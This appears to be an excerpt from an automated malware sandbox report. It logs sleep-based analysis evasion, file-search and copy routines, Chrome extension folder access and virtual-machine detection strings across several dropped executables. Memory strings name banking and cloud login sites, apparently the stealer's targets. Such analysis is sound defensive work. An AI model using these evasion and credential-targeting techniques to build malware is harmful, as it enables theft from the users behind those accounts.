Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664 Thread sleep count: 380 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7664 Thread sleep time: -11400000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7912 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7792 Thread sleep count: 1940 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7792 Thread sleep time: -3881940s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 187 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 1224 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 431 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 145 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 216 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 82 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe TID: 6476 Thread sleep count: 108 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread sleep count: Count: 1224 delay: -10
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\userAAKKKEBFCG.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 0000001C.00000002.3349004818.00000000022BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: 9fa327eb6c.exe, 00000015.00000002.2718500578.00000000025B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW^
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: vmware
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: RoamingIJEGHJECFC.exe, RoamingIJEGHJECFC.exe, 00000005.00000002.2283548107.0000000000533000.00000040.00000001.01000000.00000009.sdmp, userAAKKKEBFCG.exe, userAAKKKEBFCG.exe, 00000008.00000002.2309403161.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, userAAKKKEBFCG.exe, 00000008.00000001.2247336233.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, explorti.exe, 00000009.00000002.2317563389.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000B.00000002.2318335961.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 0000000F.00000002.2347284132.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000010.00000002.2347343665.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3308623436.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 00000014.00000002.3309306166.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Hyper-V (guest)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.00000000007C6000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.00000000007C6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ~VirtualMachineTypes
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.00000000007C6000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.00000000007C6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.00000000007C6000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.00000000007C6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: RoamingIJEGHJECFC.exe, 00000005.00000002.2283548107.0000000000533000.00000040.00000001.01000000.00000009.sdmp, userAAKKKEBFCG.exe, 00000008.00000002.2309403161.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, userAAKKKEBFCG.exe, 00000008.00000001.2247336233.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, 00000009.00000002.2317563389.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000B.00000002.2318335961.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 0000000F.00000002.2347284132.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000010.00000002.2347343665.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3308623436.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 00000014.00000002.3309306166.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
